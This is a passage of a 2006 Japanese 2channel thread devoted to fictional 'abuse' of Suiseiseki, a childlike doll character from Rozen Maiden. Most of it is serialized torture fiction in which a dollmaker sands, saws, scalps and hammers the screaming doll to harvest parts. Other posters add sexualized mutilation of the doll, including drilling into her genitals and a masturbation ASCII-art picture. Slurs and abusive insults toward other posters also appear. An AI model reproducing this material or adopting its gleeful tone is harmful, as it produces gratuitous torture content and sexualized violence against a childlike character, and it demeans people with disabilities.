    /∵∴∵∴\
    /∵∴∵∴∵∴\
   /∵∴(・)∴∴.(・) |
   |∵∵∵/ ○\∵|
   |∵∵ /三 | 三| |      /  
   |∵∵ | __|__ | |    < 糞スレ立てる>>1は氏ね!蛆虫め!! 
    \∵ |  === .|/      \
   / \|___/\                 
  │ ∴∵━━○━∴│
  │∵∴/___\: |
   | :/∵|  \_/ ||_|
   ○ |∴ \____/ |_)
     |∵∴∵Λ∵∴/
    ( ̄ ̄ ̄)( ̄ ̄)




656 :名無しかわいいよ名無し:2006/03/08(水) 13:02:46 ID:gk0tgwy7
>>655

この私と闘るのか?
   ∧_∧
   (´∀`)
  /⌒  ~`)
 ( くノ | イ
  ヽ_ァ  , |
   ノヽ_λ_ )
  /  ノ| ノ
  ( -く |ー(
  \ └| 丿
   ,┘/(_)

657 :人形師:2006/03/08(水) 13:18:01 ID:zil8/kFo
「ひっく、ひっく、ううぅっ、ひどいです、翠星石はまがい物なんかじゃ...安物じゃないのです...
 蒼星石とは正真正銘の姉妹なのです...ひっく、うう...」
「たしかに『まがい物』とは言ったがな、それはあくまでも『薔薇乙女じゃない』という意味であって『ローゼンの作品ではない』という意味じゃない。
 オマエは『正真正銘ローゼンの作品』さ、その点は保障してやってもいい。そうでないと意味がないだろう?さもないと僕の計画が無意味になる」
「ふえ?計画...?」
「そうさ僕はアレ...蒼星石というのか?そう蒼星石を修復するつもりだ。だがあちこち部品が欠損している...だが僕には一からローゼンと同じものを作る技術はない
 だが......知っているか?2台の事故車同士のマトモな部分を組み合わせて1台の中古車として売る商法を?よくニコイチっていうだろ?」
「ふ、ふん...そんな小汚い商売のことをこの翠星石が知るわけないです!そういうケチなやり方はオマエみたいな薄汚いヤツにふさわしいのです!」
「おしゃべりが過ぎたようだ...こうしてガラクタとしゃべっていても埒があかないし...とっとと作業にとりかかるとするか」
「あ、こら!無視するなです!翠星石たちをどうするつもりですぅ!」

騒ぎ立てる翠星石を無視して男は翠星石の下着をめくった。つるっとした翠星石の尻があらわになる。
いきなり下着をめくられた恥辱と尻が外気にさらされる感触に、翠星石は真っ赤になってしまう
「きゃあああああっ?!い、いきなり、な、何するですかぁぁぁ〜〜このスケベ!変態ですぅうう!!!見んな!見んなですぅ〜っ!!」
と、
ガリッ! ガリガリ...ガリガリガリッ...ガガガガガガッ!ガリガリガリ...
「痛あっ!?!いたたた!痛い痛い痛い痛い痛い痛い痛い痛い痛い痛い〜〜ッ!!な、な、なにを何を?!!いやあああ!痛いですぅ!!!
 ?!!っ!?す、翠星石のお、お尻に何をしてるですかぁぁぁぁ?!!!」

首をめぐらせ、後ろを向いた翠星石が見たのは、自分の尻をヤスリがけしている男の姿だった。
「なにって...焦げた蒼星石の表面を修復するための顔料を作るために、オマエの尻を削っているんだが?ここが一番層が厚いからたくさん取れるだろう?
 絵画の世界でも巨匠たちの絵を修復するのにその巨匠の駄作や弟子の作品を削って当時と同じ材料を捻出することはよくあることさ」
ガリガリガリガリガリガリガリッガリガリガリガリガリ!ガガガガガ...
「痛〜〜〜〜〜いッ!痛いッいたたたたたたっ!!!そ、それに熱いですっ!熱い熱い熱いっ!!熱くて翠星石のお尻がお尻が摩擦熱で まさちゅーせっつ ですぅぅうっ!!!
 いやあああああっ!!!こすらないでっ!こすらないで〜〜っ!そんなにこすったらお尻に火がついちゃうですぅ〜!!痛い痛いっ熱いっ!熱いですよ〜〜
 やめてやめてやめてぇっ!!!やめてですっ!や〜め〜て〜で〜すぅぅっ!!!」


658 :人形師:2006/03/08(水) 13:57:57 ID:zil8/kFo
「ふうっ...こんなものか。これだけあれば充分だな」
翠星石の尻から作った削りカスを容器に集めた男はそんなことを言って作業台からいったん離れた。
「うぅっ痛かったですよぉ...熱かったですぅ...」
そう涙ぐみながら、後ろを振り向いて翠星石はヤスリがけされてしまった自分の尻を見る。
「ああっ...す、翠星石のお尻が...」
翠星石の尻は見るも無残だった。丸みをおびていた尻はささくれ、あちこちに削れた跡が目立っている。これでは元通り下着をつけたとしてもひっかかってしまうだろうし、
うまく座ることさえままならないだろう。それほど原型をとどめていない尻を見て翠星石は悲嘆にくれた」
「ひ...ひっく...ひっ、ひっ、ひどいですぅぅぅ...す、翠星石のお尻...お尻が...お尻が...なくなっちゃったのですぅ...ううっ」

どのくらいそうしていただろうか。男が戻ってきた。
「ははははは、見ろ!蒼星石を!表面の焦げを落として綺麗にしてオマエから採取した顔料で肌を整えたんだ。
 どうだ、うまくいっただろう?」
翠星石は涙ぐんだ目で作業台に横たわる蒼星石を見た。
「あ...」
さっきまで黒ずみ無残な焦げ跡を残した蒼星石の姿はなく、そこには生きて動いていた頃と同様、薔薇色の頬とつややかな白い肌の
穏やかな眠りの表情で横たわる蒼星石の姿があった。この男、どうやらそこそこの技術は持っているらしかった。
「表面の加工はこんなもんで良いか...あとは欠けてる部分の修復だな」
そう言って男は再び翠星石に向き直る。横たわる蒼星石の穏やかな顔にみとれていた翠星石は男の動きにビクリとする。
「あ...な、なんですか...?」
「今度は欠損部の補充をするんだ」
そういうと、やおら男はガシッっと翠星石の体をすごい力でおさえ込むと、ペンチや鋏に良く似た工具を翠星石の手と腕の境の関節にねじ込んだ。
「ぎぃやぁぁぁあああああっ!!!痛いっ!!イタイイタイッ!!痛〜〜〜〜〜っ!!!ななななな何をっ何をするですかあああっ??!!!いやあああああああっ!!!!
 痛い痛いっっ!!!やめてやめて〜〜〜〜っ!!!!!」
「球体...関節は...体のパーツに特殊な線を通してつないでいる...くっ、動くな...線は丈夫だから、ちょっとやそっとでは切れない...
 だから線をひっかける部品を直接はずす、部品は体の奥、もしくは手首にある...動くなって、はずせないだろう?傷をつけたら元も子も無いんだから...よっと」
こきっ!
「ぎゃああああああああああああああっ???!!て、手首があああああ!!!!翠星石の手首があああああっ!!!?」
カランと翠星石の手首がはずれる。まるで脱臼したときの痛みを感じて、翠星石はのたうちまわる。
手首だけじゃなかった。押さえの役割をはたす手首の部品がなくなった翠星石の腕は方の付け根からきれいにコロンコロンとバラけていく。
「きゃああああああっ!か、肩からしたの感覚が...感覚がなくなっていくです...いやあああ〜〜っこわい〜っ!怖いですぅ!翠星石の腕がなくなっていくですぅ!!」

コロン
最後のパーツが肩からはずれ台にころがる。翠星石の肩口は何かがはまっていたような跡がのこり、あいた穴からは体と腕をつないでいたであろう
線がのびているだけになった。
「翠...星石の...う、腕が...腕が、腕が!な、なくなっちゃったです...腕が〜〜〜っ!!!」
「よし、腕確保っと」
痛みと腕を失った衝撃で頭が真っ白になる翠星石を尻目に男は翠星石の腕のパーツをカゴに入れ、
いきようようと蒼星石の作業台に向かうのだった。




659 :名無しかわいいよ名無し:2006/03/08(水) 14:34:23 ID:zIemldwN
>>649
だから早く精神科行けよ知的障害者
IDと前後の書き込みの違いから別人だと言う事がわからないのか?( ´,_ゝ`)プッ
友達がいないんだろ?
お前も仲間にしてやっからさ、なんか気の利いたこと言えよ

660 :名無しかわいいよ名無し:2006/03/08(水) 14:52:04 ID:qz+UDEgv
                     ''';;';';;'';;;,.,                  ザッ
                       ''';;';'';';''';;'';;;,.,   ザッ
          ザッ            ;;''';;';'';';';;;'';;'';;;
                        ;;'';';';;'';;';'';';';;;'';;'';;;
                        vymyvwymyvymyvy     ザッ
               ザッ     MVvvMvyvMVvvMvyvMVvv、
                   Λ_ヘ^−^Λ_ヘ^−^Λ_ヘ^Λ_ヘ
     ザッ            ヘ__Λ ヘ__Λ ヘ__Λ ヘ__Λ
                __,/ヽ_ /ヽ__,.ヘ /ヽ__,.ヘ _,.ヘ ,.ヘ    ザッ
    /\___/ヽ   /\___ /\___/ヽ _/ヽ /\___/ヽ
   /''''''   '''''':::::::\/''''''   '''/''''''   '''''':::::::\   /''''''   '''''':::::::\
  . |(●),   、(●)、.:|(●),    |(●),   、(●)、.:|、( |(●),   、(●)、.:|
  |   ,,ノ(、_, )ヽ、,, .::::|   ,,ノ(、_, )|   ,,ノ(、_, )ヽ、,, .::::|_, )|   ,,ノ(、_, )ヽ、,, .::::|
.   |   `-=ニ=- ' .:::::::|   `-=ニ= |   `-=ニ=- ' .:::::::|ニ=|   `-=ニ=- ' .:::::::|
   \  `ニニ´  .:::::/\  `ニニ \  `ニニ´  .:::::/ニ´ \  `ニニ´  .:::::/
   /`ー‐--‐‐―´\ /`ー‐-  /`ー‐--‐‐―´\-‐‐ /`ー‐--‐‐―´
「vipから来ますた」「vipから来ますた」「vipから来ますた」「vipから来ますた」

661 :名無しかわいいよ名無し:2006/03/08(水) 16:26:10 ID:GCgJhsLL
スレ違いだが
ローゼンメイデンのSS保管庫や総合は
どこにあるかね、誘導よろしくです。

662 :名無しかわいいよ名無し:2006/03/08(水) 16:30:53 ID:9+fsG/SS
http://rozen-thread.org/2ch/test/threadsearch.cgi?b=doujin

http://rozen.s151.xrea.com/

どっちかすっきな方を選べ。

663 :人形師:2006/03/08(水) 17:01:41 ID:zil8/kFo
「うう...翠星石の翠星石の腕がなくなっちゃったですぅ...翠星石の腕がぁ...ううっ」
「おい見てみろ」
その声に翠星石は蒼星石の横たわる作業台を見る。そこには新たに翠星石の腕をつけられ作業台に横たわる蒼星石の姿があった。
蒼星石は両手を胸の上で祈るように組んで眠るように横たわっていた。まるで声をかければ目を覚ますかのように...
もっともそれは無残に砕けた足さえなければであったが...
「さて...次は足だな」
「な、ななななな...何ですってぇ〜〜!!ま、まさか??!」
「察しがいいね。そうだよ、次は君の足をもらう。さいわい君たちのパーツはお互いピッタリなのでね」
「あ、当たり前ですぅ!翠星石と蒼星石たちは双子なんですからっ!!」
「またそれか...おめでたいというか、あわれというか...オマエらは同じローゼンの作品、作家のクセというか規格が同じというに過ぎないんだ」
そういって翠星石に屈みこむ男。
「いやああああああ!!今度は翠星石の足を取るつもりですかあああああ!!!やめて、やめてですぅ〜!!
 こ、こんなことは、こんなことは狂ってる、狂ってるですよ〜〜〜!!!!」
「狂ってる?...なぜ?誰でもやっていることだろう?廃車同然になった名車に新しいエンジンを載せかえることは普通に行われてる。
 古い機械の錆びてない部分を寄せ集めて一台分の部品として組み立てる行為はアンティークショップなんかではよく行われているんだよ?それと同じさ。
 僕は美しき至高の薔薇乙女を世に復活させるためには人形をいくつ潰してもいっこうにかまわないんだ。まあ人によってはもったいないなんて言うのもいるけどね」
「す、翠星石は車とは違うのです〜〜〜翠星石は生きているんですよぉ〜〜!!!」
「オマエその言葉は全国の車マニアを敵に回したかもしれないぞ...ま、僕には関係ないけど...と、さっそく...」
男の手が翠星石の足首にのびる。翠星石は残った手足をバタつかせながら抵抗する。だが力で男にかなうわけもなく押さえ込まれてしまう翠星石。
「いやああああああっやめるです!触るなですぅ〜〜!!翠星石の足を取ったら承知しねぇですぅぅ!!!」
「く...動くなって...足に傷がつくだろう?」
そう言って先ほどと同じように工具を関節のすき間に入れようとする。
「く...すき間が...せまい...な、足首じゃなく股関節の方からいくか」
そう言って男は翠星石の下着に手をかけ、いっきに引きずり下ろす。
「い、いやあ〜ああああああああ〜あああああ〜〜〜〜あ〜〜〜〜っ!!!!」
股間を見られる羞恥心で泣き叫ぶ翠星石。
「ダメだ...こっちも...考えてみれば、駆動することだけでなく自重を支える役目をする足だ。
 それに耐えられるよう関節も腕のそれより複雑な構造になっているのは当然のことだな...う〜む...
 ...そうだ、蒼星石に必要なのは膝から下の部分だ...となれば...ももの部分から切断するか」
「切断...切る...?翠星石の足をっ?!い、いや...いやいやいやいやいやいやいやぁ〜〜〜〜〜!!!!!!!!」

664 :名無しかわいいよ名無し:2006/03/08(水) 17:11:13 ID:nmcIQzsx
>>631のつづき
「くはぁ、うまかったぁ♪」
食べ終わった人間は満面の笑みで顔をあげた。そして床に広がっているゲロに気づいた。
「なにしてんだよ。ゲロ人形!」
ガコ
「ヒッ、痛いですぅ・・・」
翠星石は頬を殴られた。
「デブ人間があまりに気持ちわりぃから吐いちまったじゃないですか!」
状況を読めず、大声を出し強がる翠星石。
「 な ん だ と 」
ギュル チャリン チャリン チャリン
「ひぎゃ、痛いですぅ! 気をつけやがれです!」
人間は翠星石の額のフックを乱暴にはずしさかさまにした。
「やめろですぅ! 頭に血がのぼっちまうじゃないですか!」
「もうのぼってるだろw」
人間はそういうとさかさまにした翠星石を床に広がったゲロの真上に持ってきた。
「汚いです!」
「テメェが吐き出したもんだ。テメェで掃除しろや!」
ガツン
翠星石は顔を自らのゲロに押し付けられた。酸っぱいにおいが鼻腔いっぱいにひろがる。
「ウグッ!」
「さぁ、はやく犬みたいになめとれやw」
「悪魔!」
ゲシッ
翠星石は後頭部を踏まれた。
「御託はいいからさっさとしろや!」
「フグッ! わかったですぅ・・・もう痛いのは嫌ですぅ」
ためらいがちに舌を出し、少しの躊躇のあと自らのゲロをなめはじめる翠星石。
ピチャ ピチャ ピチャ ピチャ ピチャ
「うっ、臭いですぅ・・・うっぐ、うっぐ」
涙を流しながらゲロをなめとる翠星石。
「ヒャハッハッハッ! ゲロ人形にお似合いの姿だぜ! あっ、ゲロに失礼だなw」
「ひどいですぅ・・・ひっぐ」
ピチャ ピチャ ピチャ ピチャ

665 :人形師:2006/03/08(水) 17:15:09 ID:zil8/kFo
「大丈夫、すぐ済むから」
そう言って大きなノコギリを翠星石の足の太ももの部分にあてる。そしておもむろに横にひいた。
ギィィィィィィィィ!
「ぎゃあああああああ〜〜〜〜〜〜っ!!!!!痛いぃぃぃぃっ!!痛いですううう!やめてぇえええ!!!」
ギシギシギシギシギシギシギギギギギギ、ギィイィィッィイイィィイイィッ!
「あ―――――っ!!んぁっああああ〜〜〜〜〜っ!!痛い嫌ッ〜〜〜ぁ〜〜誰かああああ〜〜〜イタイイタイ嫌ッ〜〜!!
 やめて止めてやめて止めてやめて止めてやめて止めてやめて止めてやめて止めてぇぇぇですぅぅうっぅう!!!!!!!」

 ガコッ
「んぎゃああああっ!!!!あ、足の感覚が...ない!ないです!足の感覚がないですよぉぉぉ!!!!!」
翠星石は残った方の腕で、太ももの辺りを触る...だが、そこにはもう翠星石の足の影も形もなかった。
「ああああああああああああぁぁぁぁ、翠星石の足が足が...翠星石はもう、もう、ジャンクなのですぅううううう!!」
「ふ〜〜ぅ、やっと切れた...さっそく蒼星石に取り付けよう」
翠星石の嘆きなど、はなから聞こえてないように男は嬉々として蒼星石の作業台に向かうのだった。

666 :名無しかわいいよ名無し:2006/03/08(水) 20:38:31 ID:SGJkPDVv
こんな下賤でくだらないゴミ人形にもこんな狂信者がいるとは..
://www.geocities.jp/suiseiseki1031/
://info.from.jp/mu/robom.cgi?nonono=2943-1

667 :人形師:2006/03/08(水) 21:12:16 ID:zil8/kFo
「ジャンク...ううう...翠星石はジャンクなってしまったですよぉ...あああああ」
そんな嘆きをよそに男は興奮していた。
「はははははは、ようし、あと一息だ見るがいい」
自らの惨状に茫然としながらも、男の声に振り返った翠星石は作業台に横たわる蒼星石を見た。
薔薇色の頬、夢見るように閉じられたまぶた、胸の上で祈るように重ね合わされた手、そしてスラリとのびる足。
「あああ...蒼...星石ぃ...」
翠星石は残った手をわななかせながら伸ばした。その手が届くはずもないが伸ばさずにいられなかったのだ。

だが

「だが、これではまだ完璧ではない」
「え...」
男は蒼星石の頭の下に手を入れるようにして蒼星石の顔を起こした。そして翠星石にも見える角度に顔を傾ける。
そしておもむろにその閉じられたまぶたに手をやり、ムリヤリこじあけた。
「ああっ?!そ、蒼星石の目が?!」
「そうさ、壊れたときの衝撃か、はたまた焼けたときに溶けてしまったのか、右の眼球が無いんだ!だから...」
「ひ、ひいぃぃっ!!?」
その言葉の意味が痛いほどわかった翠星石はおびえた声を出した。男はかまわず言葉を続ける。
「今度は眼球をいただこう」
そう言って近づく男を見て翠星石は半狂乱になる。
「いやいやいやいやいやいやいやいやいやぁぁ〜〜〜〜!!!!目を、目を取られるなんてぇぇ〜〜〜嫌ァ〜〜〜っ!!!
 こわいこわいこわいこわいこわいですよぉおぉぉぉおぉぉぉ!!!取らないで取らないで取らないで〜〜〜!!!
 翠星石の目を取らないで〜〜〜見えなくなっちゃうです!痛いのは嫌〜〜〜〜〜〜〜〜〜〜!!!!!!!!!」
男の手が泣き叫ぶ翠星石の顔に触れる。
「この顔から眼球を取り出すには......」
「嫌っ...ま、まま、まさか、す、翠星石の顔を...顔を割って目を取り出すつもりですか...?
 嫌ッ!いやですぅ!!ドールにとって命より大事な顔を割るなんてっ!!やめて!やめてですぅ!!!」
そんな翠星石をなだめるように男は微笑を浮かべ翠星石の髪を優しく撫でながら諭した。
「ははっ、まさか...僕だって人形師のはしくれ。人形の顔を割るなんてそんな残忍なことはしないよ。
 それにそんなことをしたら、大事な眼球が顔の破片で傷がついてしまうだろう?そんな無意味なことはしないよ。
 ...だから」

ぐいっ
「ぎゃあああああああっ?!な、何するですかぁ?!!」
男はそれまで撫でていた翠星石の髪を乱暴にむんずとつかみ上げながら言った。
「球体関節人形は頭頂部に眼球をとりつけるためのフタがついているんだ。フタを開けるには髪が邪魔だろう?
 だから、むしり取ろうと思ってね」

べりっ
とか言ってる間にも男は翠星石の髪を根こそぎ はぎ取ろうとする。
「うぎゃぎゃぎゃぎゃあっ!!!痛いっ!!無理ですよお!!頭が取れちゃうですぅ!!!」
「無理じゃないさ。オマエは頭に直に植毛なんかされてない。たんに人形サイズのかつらをかぶせているだけさ。
 もっとも長年のせいで、かつらと頭を貼り合わせている接着剤が変質して硬くなってしまっているが...そらっ!!」

べりべりべりっ!
「ぎぃいやあああああああああっ!!!頭の皮がああああっ!!!!!やめてええええええええええ!!!!!」
翠星石の髪はその地肌ごと、半分以上めくりあがり、その下の白茶けた頭が見えてしまっていた。


668 :人形師:2006/03/08(水) 21:30:40 ID:zil8/kFo
「ぎゃあああああああああっ??!!す、翠星石の髪が髪が髪がぁっ!!!頭が頭が頭がっ!
 いやあああああああああああああああああああっっ!!!!!!!!!!」
半ばまで剥がされた頭皮がべロリと顔の前までたれ、そのたれた頭皮に自分の自慢の髪がくっついているのを見た翠星石は
悲鳴をあげた。目の前の光景が信じられなかった。
「ひどい...ひど...ひどいぃぃぃ...ひどいひどいひどい、ひどいですぅ...翠星石の髪...大事な大事な翠星石の髪...
 ああああああ...翠星石の自慢の髪が...毎日大事にブラッシングしてたのに...こんな...こんな...」
そんな翠星石を気にも留めず男はむき出しになった翠星石の頭部を調べる。
「確か、この辺に...フタが...あ、あったぞ!さっそく開けて...ん?キツイな?やはり頭皮と同様、
 長年の経年劣化でフタもきつくなってしまったのだな。ならば仕方がない、これを使うか」

コン...コンコン!
「うぎゃっ!!?んぎゃっ!!な、何?なんですかぁ?!!」
「動くな、ノミでフタをこじ開けるんだから!」
「な、なんですってぇえええっ!!!」(コンッ!)「げはっ!!やめて!」(コンコンコン!)「いたたたたたた!!!やめて〜〜〜!!!」
「ちっ上手くいかないな、横から叩いてみるか」
というなり男は金槌を取り出し翠星石のコメカミを叩き始めた。
ゴンゴンゴンッ!!
「んぎゃあああああっ!!!やめっ、んぎゃああ!!やめ、痛いっ!頭がガンガンするです痛いです!気持ち悪くなってきたです!うげえええええ叩くのはやめてええええええ!!!!」

かぱっ
「お、フタが開いたぞ!どれ、眼球を取り出すぞ」
「ひっ、ひぃ、ヒアjdkjファjdじゃあkjkだあじゃかkだああああっ???!!!」
翠星石は自分の頭蓋の中に他人の手が入る感触におぞけが走った例えようの無い異様な感触、
まるで脳髄を他人の手でまさぐられる、とでも言うような、そんな感触だった。


669 :名無しかわいいよ名無し:2006/03/09(木) 01:14:08 ID:IciSZe5f
人形師GJ

670 :名無しかわいいよ名無し:2006/03/09(木) 02:08:22 ID:/3PSFOGL
ローゼンスレたくさんみてきたけど、ここは異色の存在だな。

671 :名無しかわいいよ名無し:2006/03/09(木) 03:38:08 ID:/TcoHLJj
誘導するやつもいるしこのスレはもそんないかれてはいないだろ
某アクションゲームのアンチは凄いからねえ。
>>614の意見は悔しいがまと得てるわ・・・
俺は安易に萌え求めるとこあるんで
こういう作品はあっていいと思う。
人形師さんにはもう少しソフトにしてほしいとは思うがw

672 :名無しかわいいよ名無し:2006/03/09(木) 03:51:59 ID:NZafjBVv
デュードは段々ソフトになってきてないか?
一時期のような虐殺があんまりない。

673 :名無しかわいいよ名無し:2006/03/09(木) 12:58:00 ID:5vxAN/wq
>>668
ハンニバルで脳みそ食べるシーンを思い出した

674 :名無しかわいいよ名無し:2006/03/09(木) 13:12:38 ID:/3PSFOGL
虐殺が続き過ぎてもマンネリ気味でつまんなくなる

675 :名無しかわいいよ名無し:2006/03/09(木) 17:40:59 ID:t8mDnyII
ttp://www.borujoa.org/upload/source/upload5184.jpg
こんな感じに拷問したいなぁ

676 :名無しかわいいよ名無し:2006/03/09(木) 18:12:36 ID:X6EbT+5X
     _/)
    / / 且 つ
     \(・x・ )⌒_)⊃
      / '  (
     i⌒iヽ _, ゞ
     ∪/ ,/   ∴
      i人| +∵。
  >>614(`Д´)


677 :名無しかわいいよ名無し:2006/03/10(金) 01:52:34 ID:jcRTWpw3
>>654
実はデュード描いたの2回目。
俺だけじゃないっぽい。

678 :名無しかわいいよ名無し:2006/03/10(金) 02:16:13 ID:cGntV1mn
なにここ、キモオタの集まりじゃんwwww
という俺も飛ばされてきんだけどね

679 :名無しかわいいよ名無し:2006/03/10(金) 03:50:11 ID:5pvHhU48
↓どう見てもオナニーの最中
                   _ ......... __
               ,.ィ"/,. ィ'":.:.:.:\:.:`丶、
             / / ,:":.:.:.:.:.:.:.:.:.:.:.:ヽ:.:.:.:.:.\
            / ./ /:.:./:.:.:.:.:.:.:.|:.:ト;.:.:l:.:.:.:.:.ヽヽ
          /  / /:.:./:.:.:.:.:.:.:.:/:.:| ',:.:ト、:.:.!:.:.l:.',
         く   ,'  l:.:.:.:l:.:.:./:.:.://_/ .l:/ー-ヽ:.:| ',|
           ヽ、.」  l:.:.:.:.l:.:.l_:/フ ' /' 、,,,,,.ノ:./ ′
             /:.:.{  !:.:.:.:.Vr   ,,ィ ′  ///イ}
            /:.:.:.:{   ヘ:.:.:.:\=''"//   _   ハ!   おまんまん気持ちいいですぅ〜♪
           /:.:.:.:.:.{   ,イ_ヽT rr‐',  <ノ  , ' }    
          /:.:.:.:.:.:..{ r-,.‐-.、>、ヽヽヽ ..__/   } 
         /:.:.:.:.:.:.:.:{ </: : : : :ヽ} ヽ、  ,ヽ,‐;.:.::{


こいつ生意気だから痛めつけてやろう・・・

680 :名無しかわいいよ名無し:2006/03/10(金) 03:50:44 ID:5pvHhU48

     ⊂且∩      ___
 ♪   (・x・ )   . く人二,'ヽ>
     (_ ̄iつ ,---'、< >))|l
  ( ((  |人 (      VД´iリ|
      `/ /  ) ))⊂l_介_|)|ヘ
       i _|ヽ   ≦ノヽノ`ヘ.≧
       |_)'。   ミ<二二二>ミ
        ∵
        ∴+

           _,-,
    ⊂iヾ、 ∩且つ/      ___
    ≡ \ .( ・x・)/    く/',二二ヽ>
        ヽ i' |,へ    |l |ノノイハ))
 ≡       )人i 、ゝ. 人l|リ`Д´ノl|
         / /   ヽ< >l_介」つ
    ≡   //  ゚∴.  Vノ`ヽノヘ≧
       (/    ∵+.  ミく二二二〉ミ

681 :名無しかわいいよ名無し:2006/03/10(金) 03:51:21 ID:5pvHhU48

                        _/)
                       / / 且 つ
                       \(・x・ )⌒_)⊃
                        / '  (
                       i⌒iヽ _, ゞ
                       ∪/ ,/   ∴
                        .人| +∵。
                       く< >ヽ>
                     ,.ζ.l|ノノVイハ))
                  ⊂'⌒≦つリ>_<ノミつ

                          ___    .∞ 〜
                        く/',二二ヽ>
                      ν⌒,,ζl |ノノイハ))
                    ⊂_:#:≦|#:;)Д。#)

682 :名無しかわいいよ名無し:2006/03/10(金) 03:54:44 ID:5pvHhU48

      く/',二二ヽ> 〜∞
   ν⌒. |l |ノノイハ))) 
  ⊂_:# |l リ#;)ДT#)  ・・・・・・・・・・・・・翠星石のおまんまんでもおくちでも使わせてやるですぅ
      ノl
      ≦


生意気言ってるからこういうことになるんだよwwwwwwwwwww
何が「ですぅ」だ糞泥人形 !
お前を見てるとムカつくんだよ。この糞生意気性悪ジャンクドール翠星石め!
とっとと産廃物処理場に逝け!

683 :名無しかわいいよ名無し:2006/03/10(金) 04:43:59 ID:cGntV1mn
ああ、好きと嫌いな人の比は8対2位かな


684 :名無しかわいいよ名無し:2006/03/10(金) 15:27:47 ID:FH9tSRtj
>>682
翠星石のおまんまん

そんな物、薔薇乙女には必要ない。

ヤスリで削り取ってやろうw


685 :名無しかわいいよ名無し:2006/03/10(金) 15:39:49 ID:FH9tSRtj
翠「や〜め〜てですぅ!おまんまんがあるから翠星石はジュンに家に置いてもらえるのです!おまんまんが無い翠星石なんてジュンに捨てられちゃうですぅ〜」

686 :名無しかわいいよ名無し:2006/03/10(金) 20:01:42 ID:jbMlqJT1
じゃあ捨てられればぁ?うっふふふふふふふふ!
ジャンクゥジャンクゥ〜!いらない子!
第3ドールは最低の駄作だわぁ!こんなのがお父様の作品だなんてぇ
しぃ〜んじられないわぁ!

687 :名無しかわいいよ名無し:2006/03/10(金) 22:34:43 ID:FH9tSRtj
翠「待って、待ってですぅ〜!い、今ドリル使って自分でお股に穴あけるです!
翠星石が自分で自分のおまんまん作るですから、捨てないでほしいですぅ!」

688 :名無しかわいいよ名無し:2006/03/10(金) 22:54:13 ID:cGntV1mn
俺の脳みそがフ、フリーズしたよ。
ちょっとトイレではいてくる

689 :名無しかわいいよ名無し:2006/03/11(土) 00:19:38 ID:U55MmM5F
翠「ふぁ・・・ドリルで穴をあけていくうちに段々気持ちよくなってきたですぅ。
あぁん!手が、手が止まらないですぅう!」

690 :名無しかわいいよ名無し:2006/03/11(土) 01:15:42 ID:SJ4Febr+
          .ィ/~~~' 、  .∞ 〜
        、_/ /  ̄`ヽ}
     ν⌒,》@ i(从_从))
   ⊂_:#:||ヽ||#:;)Д。#)||

691 :名無しかわいいよ名無し:2006/03/11(土) 01:41:22 ID:nUmANMyM
>>689
翠「ああっ?!ドリルが、おまんまんから胃袋まで貫通しちまったですぅ!!
これじゃあ何か食べるたびに食べ物が翠星石のおまんまんからはみ出ちまうですぅ!!」

692 :名無しかわいいよ名無し:2006/03/11(土) 03:06:37 ID:EQBC4smn
>>683
なるほど翠星石虐待が好きな香具師が8割
翠星石虐待が嫌いな椰子が2割ね

693 :名無しかわいいよ名無し:2006/03/11(土) 09:09:33 ID:nUmANMyM
違う
虐待好きが8割で
虐待嫌い(虐待じゃ物足りない虐殺好き)なのが2割。

694 :名無しかわいいよ名無し:2006/03/11(土) 11:41:26 ID:ENSFG5j8
あくまでこのスレ内での話

695 :名無しかわいいよ名無し:2006/03/11(土) 11:44:29 ID:N9+987x0
俺いろんな虐待スレ集めてるんだけど、
他にも虐待スレ知らない?

696 :名無しかわいいよ名無し:2006/03/11(土) 13:01:56 ID:nkM1auPk
             _                         ,,从.ノ巛ミ    彡ミ彡)ミ彡ミ彡ミ彡)ミ彡)''"
             ,'´r==ミ、                   人ノ゙ ⌒ヽ         彡ミ彡)ミ彡)ミ彡)'
       ,_ _ _   卯,iリノ)))〉 _ _ _ゴオオオオオ     ,,..、;;:〜''"゙゙       )  从    ミ彡ミ彡)ミ彡,,)i
     /   `."-|l〉l.゚ ー゚ノl/    ,,..、;;:〜-:''"゙⌒゙          彡 ,,     ⌒ヽ     ミ彡"
    '"'⌒`~"'" ''|!/'i)卯iつ i==m==:::゙:゙                    '"゙∀`) >>642   ミ彡)彡''"
            ''y /x lヽ      ``゙⌒`゙"''〜-、:;;,_              )   彡,,ノ彡〜''"
           l†/しソ†|                ゙⌒`゙"''〜-、,,     ,,彡⌒''〜''"人 ヽノ
           lノ   レ 
お馬鹿さぁん。貴方はそこで灰になってなさい


697 :名無しかわいいよ名無し:2006/03/11(土) 14:01:15 ID:U55MmM5F
>>691
翠「あ、でも食べるたびに食べ物がおまんまんを擦れて気持ちいいかもしれないですぅ(///)」

698 :名無しかわいいよ名無し:2006/03/11(土) 21:42:44 ID:nUmANMyM
翠「でも山芋やハバネロ食べたら、おまんまんがかゆくなったり痛くなったりするですぅ」

699 :名無しかわいいよ名無し:2006/03/11(土) 22:28:36 ID:R+W6aupi
>>696
9aはスルーで

700 :名無しかわいいよ名無し:2006/03/11(土) 22:35:47 ID:U55MmM5F
翠「そりゃ困るですぅ。いったい翠星石はどうすれば・・・そうです!
ジュンに翠星石の胃袋を縫ってもらえれば・・・。」

701 :名無しかわいいよ名無し:2006/03/12(日) 01:20:14 ID:xQ4UVkDM
ジュン「はァ?ふざけんな!何で俺がおまえみたいな性悪のハラのメンテしてやんなきゃなんねーんだ
前も言ったはずだ!お前はミドリのドレスを被ったゴミ!ジャンク以下のサイテーメイデンなんだよ!
せいぜい喰って垂れ流してろよw」

702 :名無しかわいいよ名無し:2006/03/12(日) 01:32:29 ID:Y/Ok/Qj3
ローゼンが来たらどうしよう・・・

703 :破壊人 ◆5g5J3l35.. :2006/03/12(日) 02:23:51 ID:64qEowrm
よし、翠星石の胃袋を縫ってやろう。
そう考えた俺は、裁縫セットを取ってきた。
ブラックジャックもビックリの手術開始だ。
まずは長針を取り出す。ここからどう虐待してやろうか?
考えた挙句、翠星石のおまんまんに突き刺すことにした。
グサッ!
「ギィヤアァァァァァァ!何するですか!このチビ人間!」
翠星石のおまんまんに激痛が走る。
「治してやってるくせに文句言うなこの性悪人形!」
「翠星石はお前みたいなゴミカス人間に治されるぐらいなら自分で治すですぅ!」
相変わらず生意気だ。翠星石のこの言葉に、普段は温厚な俺もついにキレてしまった。
「じゃあ治せるものなら自分で治せば?」
俺は翠星石を思いっきり殴りつけた。
ボコッ!ドガッ!
「痛てーですぅ!ふざけるなこのクソチビ人間!」
そう言うと翠星石は如雨露で俺を殴ってきた。
ガンッ!
「痛てーな!ただじゃ済まさないぞ!」
ドターン!
